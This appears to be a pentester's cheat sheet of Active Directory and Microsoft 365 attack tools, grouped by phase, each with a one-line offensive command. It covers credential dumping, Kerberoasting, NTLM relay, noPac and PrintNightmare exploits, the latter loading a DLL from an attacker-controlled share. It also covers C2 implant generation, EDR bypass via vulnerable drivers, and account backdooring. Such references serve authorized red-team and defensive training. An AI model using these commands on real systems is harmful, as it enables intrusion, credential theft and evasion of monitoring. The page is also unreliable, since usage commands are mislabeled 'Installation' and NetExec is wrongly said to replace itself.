Internal Pentest Tools Arsenal
Comprehensive toolkit for Active Directory attacks, lateral movement, privilege escalation, credential harvesting, and defense evasion. Organized by attack phase for quick reference during engagements.
🔍 Enumeration & Reconnaissance
BloodHound / SharpHound
Category: AD Enumeration
Graph-based AD relationship mapper. Identifies attack paths from any user to Domain Admin via ACLs, group memberships, sessions, and delegation.
Installation
SharpHound.exe -c All,GPOLocalGroup --zipfilename bh.zip

NetExec (nxc)
Category: Multi-Protocol
Swiss army knife for network pentesting. Replaces nxc. SMB/LDAP/MSSQL/WinRM/RDP/SSH enumeration, spraying, command execution.
Installation
pipx install netexec

PowerView
Category: AD Enumeration
PowerShell AD enumeration — users, groups, ACLs, GPOs, trusts, delegation, SPNs. The gold standard for AD recon.
Installation
Import-Module .\PowerView.ps1; Get-DomainUser

ldapdomaindump
Category: LDAP
Active Directory information dumper via LDAP. Exports users, groups, computers, and policies as HTML and JSON.
Installation
ldapdomaindump -u 'DOMAIN\user' -p 'Pass' ldap://DC-IP

enum4linux-ng
Category: SMB/RPC
Next-gen Windows/SMB enumeration tool. Null sessions, shares, users, groups, and password policies via RPC/LDAP/SMB.
Installation
enum4linux-ng -A target-ip

ADRecon
Category: AD Enumeration
Gathers extensive AD data into Excel/CSV — users, computers, GPOs, ACLs, LAPS, trusts. Great for reporting.
Installation
.\ADRecon.ps1 -OutputType XLSX

🔐 Credential Attacks
Responder
Category: Man-in-the-Middle
LLMNR/NBT-NS/MDNS poisoner. Captures NTLMv1/v2 hashes from multicast name resolution on the local network.
Installation
responder -I eth0 -wFb

Mimikatz
Category: Credential Dumping
The credential extraction tool. LSASS dumping, Kerberos ticket extraction, DPAPI decryption, DCSync, golden/silver tickets.
Installation
sekurlsa::logonpasswords

Rubeus
Category: Kerberos
C# Kerberos abuse toolkit — AS-REP roasting, Kerberoasting, S4U, delegation abuse, ticket forging, and pass-the-ticket.
Installation
Rubeus.exe kerberoast /outfile:hashes.txt

Impacket
Category: Multi-Purpose
Python network protocol library. Includes secretsdump (DCSync), ntlmrelayx (relay), psexec/wmiexec/smbexec, GetUserSPNs, and 50+ tools.
Installation
pip install impacket

hashcat
Category: Password Cracking
GPU-accelerated password cracker. Supports 300+ hash types including NTLM, NTLMv2, Kerberoast, AS-REP, and NetNTLM.
Installation
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

Coercer
Category: Coercion
Automatically finds and exploits Windows authentication coercion vulnerabilities (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce).
Installation
coercer coerce -u user -p pass -t DC-IP -l LISTEN-IP

ntlmrelayx (Impacket)
Category: Relay
NTLM relay attack tool. Relays captured authentication to SMB, LDAP, MSSQL, HTTP, and ADCS. Supports RBCD and shadow credentials.
Installation
ntlmrelayx.py -t ldap://DC-IP --delegate-access

SharpDPAPI
Category: Credential Harvesting
C# DPAPI abuse — decrypts browser passwords, credential blobs, and vault entries using user/machine/domain keys.
Installation
SharpDPAPI.exe triage

💥 Exploitation
Certipy
Category: ADCS
AD Certificate Services enumeration and abuse. Finds and exploits ESC1-ESC13 misconfigurations for domain privilege escalation.
Installation
certipy find -u user@corp.local -p Pass -dc-ip DC-IP -vulnerable

Whisker
Category: Shadow Credentials
Shadow Credentials attack tool. Adds msDS-KeyCredentialLink to target accounts for certificate-based authentication.
Installation
Whisker.exe add /target:victim /domain:corp.local

KrbRelayUp
Category: Privilege Escalation
One-click local privilege escalation via Kerberos relay. Combines RBCD + S4U for SYSTEM from any domain user.
Installation
KrbRelayUp.exe relay -Domain corp.local -CreateNewComputerAccount -ComputerName YOURPC$ -ComputerPassword Pass

noPac (SAMAccountName)
Category: CVE Exploit
Exploits CVE-2021-42278/42287. Impersonates the Domain Controller via SAMAccountName spoofing for instant DA.
Installation
noPac.py corp.local/user:Pass -dc-ip DC-IP --impersonate administrator -dump

PetitPotam
Category: Coercion
Coerces Windows hosts to authenticate via MS-EFSRPC. Chain with ntlmrelayx to ADCS for domain takeover.
Installation
petitpotam.py LISTEN-IP DC-IP

PrintNightmare
Category: CVE Exploit
CVE-2021-34527 — remote code execution via the Windows Print Spooler for instant SYSTEM on unpatched hosts.
Installation
CVE-2021-1675.py corp.local/user:Pass@TARGET '\\ATTACKER\share\evil.dll'

🔄 Lateral Movement & Remote Access
Evil-WinRM
Category: Remote Access
Feature-rich WinRM shell — file upload/download, PowerShell, DLL loading, log evasion. The go-to for Windows remote access.
Installation
evil-winrm -i TARGET -u admin -H NTLM_HASH

psexec / smbexec / wmiexec
Category: Remote Execution
Impacket remote execution suite. PsExec (service), SMBExec (no disk write), WMIExec (stealthier). All support pass-the-hash.
Installation
wmiexec.py -hashes :NTLM corp.local/admin@TARGET

atexec / dcomexec
Category: Remote Execution
Impacket alternatives for lateral movement via Task Scheduler (atexec) or DCOM (dcomexec). Less commonly monitored.
Installation
atexec.py corp.local/admin:Pass@TARGET 'whoami'

SharpRDP
Category: Remote Access
Remote Desktop Protocol command execution. Authenticates via RDP and sends keystrokes for stealthy execution.
Installation
SharpRDP.exe computername=TARGET command='cmd /c whoami' username=admin password=Pass

🏴 Post-Exploitation & Privilege Escalation
WinPEAS
Category: Privilege Escalation
Windows privilege escalation enumeration — services, registry, credentials, scheduled tasks, DLL hijack opportunities.
Installation
winpeas.exe quiet servicesinfo

Seatbelt
Category: Situational Awareness
GhostPack C# security audit tool — system info, credentials, browser data, installed software, and security product detection.
Installation
Seatbelt.exe -group=all -full

LaZagne
Category: Credential Harvesting
Retrieves passwords stored on a local computer — browsers, databases, mail, Wi-Fi, sysadmin tools, and more.
Installation
lazagne.exe all

SharpUp
Category: Privilege Escalation
C# port of PowerUp. Finds common Windows privilege escalation vectors: misconfigured services, unquoted paths, modifiable binaries.
Installation
SharpUp.exe audit

🛡️ Defense Evasion
ScareCrow
Category: Payload Generation
Payload creation framework for side-loading. EDR bypass via signed DLLs, process injection, and syscall obfuscation.
Installation
ScareCrow -I beacon.bin -Loader dll -domain microsoft.com

Nim / NimPackt-v2
Category: Payload Development
Nim-based payload framework. Compiles to native Windows binaries with low AV detection rates.
Installation
python3 NimPackt.py -e shinject -i beacon.bin -t csharp

BOF.NET / Cobalt Strike BOFs
Category: In-Memory Execution
Beacon Object Files — in-memory .NET execution and custom BOFs for EDR evasion within C2 frameworks.
Installation
# Load via C2 beacon

EDRSandBlast
Category: Kernel Bypass
Kernel-level EDR bypass via vulnerable drivers (BYOVD). Removes kernel callbacks, ETW providers, and minifilter altitudes.
Installation
EDRSandblast.exe --usermode --kernelmode

🌐 Pivoting & C2 Frameworks
Ligolo-ng
Category: Pivoting
Advanced tunneling/pivoting tool using a TUN interface. Creates transparent network tunnels without SOCKS proxies.
Installation
# Proxy: ligolo-proxy -selfcert
# Agent: ligolo-agent -connect PROXY:11601 -retry

Sliver
Category: C2 Framework
Open-source C2 framework. HTTP(S)/mTLS/WireGuard/DNS implants, BOF support, traffic encryption, pivoting.
Installation
sliver > generate --mtls LISTEN_IP --os windows --save implant.exe

Havoc
Category: C2 Framework
Modern C2 framework with demon agents. Sleep obfuscation, indirect syscalls, token manipulation, and BOF execution.
Installation
# Build and run Havoc teamserver

chisel
Category: Pivoting
Fast TCP/UDP tunnel over HTTP with SSH. Port forwarding and SOCKS5 proxy through restricted networks.
Installation
# Server: chisel server --reverse -p 8080
# Client: chisel client PROXY:8080 R:socks

☁️ Cloud & Hybrid Identity
AADInternals
Category: Azure AD
Azure AD / Entra ID toolkit. Tenant recon, PTA backdoors, Seamless SSO abuse, AAD Connect credential extraction.
Installation
Import-Module AADInternals; Invoke-AADIntReconAsOutsider -DomainName corp.com

ROADtools
Category: Azure AD
Azure AD enumeration framework. Dumps users, groups, service principals, apps, conditional access, and device registrations.
Installation
roadrecon auth -u user@corp.com -p Pass; roadrecon gather; roadrecon gui

GraphRunner
Category: M365
Post-exploitation framework for the Microsoft Graph API. Token manipulation, email access, Teams messages, and SharePoint enumeration.
Installation
Import-Module .\GraphRunner.ps1; Get-GraphTokens

TeamFiltration
Category: M365
Cross-platform framework for enumerating, spraying, exfiltrating, and backdooring Microsoft 365 / Teams accounts.
Installation
TeamFiltration.exe --outpath results --enum --domain corp.com

📚 Recommended Books
Essential command references to keep within arm's reach during engagements.
Black Hat Python, 2nd Edition
Justin Seitz & Tim Arnold (2021)
Build custom pentest tools in Python — network sniffers, credential harvesters, C2 implants, and automation scripts.
Operator Handbook
Joshua Picolet
Red/Blue/OSINT command reference in a field-manual format. Quick-reference commands for every phase of an engagement.